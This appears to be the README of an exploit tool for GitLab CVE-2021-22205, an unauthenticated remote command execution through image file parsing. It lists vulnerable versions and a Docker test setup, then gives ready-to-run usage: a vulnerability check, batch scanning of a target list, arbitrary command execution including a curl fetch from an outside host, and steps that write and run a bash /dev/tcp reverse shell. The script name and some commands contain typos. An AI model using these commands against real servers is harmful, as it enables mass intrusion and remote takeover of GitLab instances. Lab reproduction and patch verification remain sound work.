Vuln Impact
An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.
Vuln Product
- Gitlab CE/EE < 13.10.3
- Gitlab CE/EE < 13.9.6
- Gitlab CE/EE < 13.8.8
Environment
export GITLAB_HOME=/srv/gitlab
sudo docker run --detach \
--hostname gitlab.example.com \
--publish 443:443 --publish 80:80 \
--name gitlab \
--restart always \
--volume $GITLAB_HOME/config:/etc/gitlab \
--volume $GITLAB_HOME/logs:/var/log/gitlab \
--volume $GITLAB_HOME/data:/var/opt/gitlab \
gitlab/gitlab-ce:13.9.1-ce.0
Vunl Check
Basic usage
python3 CVE-2021-2205.py
Vuln check
python3 CVE-2021-2205.py -v true -t http://gitlab.example.com
command execute
python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "curl http://192.168.59.1:1234/1.txt"
python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "echo 'Attacked by Al1ex!!!' > /tmp/1.txt"
batch scan
python3 CVE-2021-2205.py -s true -f target.txt
Reserve Shell
python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "echo 'bash -i >& /dev/tcp/ip/port 0>&1' > /tmp/1.sh"
python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "chmod +x /tmp/1.sh"
python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "/bin/bahs /tmp/1.sh"
Reference
https://github.com/mr-r3bot/Gitlab-CVE-2021-22205
https://devcraft.io/2021/05/04/exiftool-arbitrary-code-execution-cve-2021-22204.html
118 Dec 31, 2022
10 Oct 06, 2022
368 Jan 02, 2023
219 Nov 28, 2022
4 Aug 17, 2022
7 Jul 14, 2022
2 Feb 15, 2022
108 Dec 04, 2021
144 Nov 19, 2022
44 Nov 21, 2022
247 Jan 02, 2023
11 Apr 02, 2022
80 Nov 28, 2022
21 Dec 27, 2022
41 Nov 09, 2022
8 Oct 20, 2022
45 Dec 20, 2022
5 Oct 08, 2022
4 Oct 24, 2022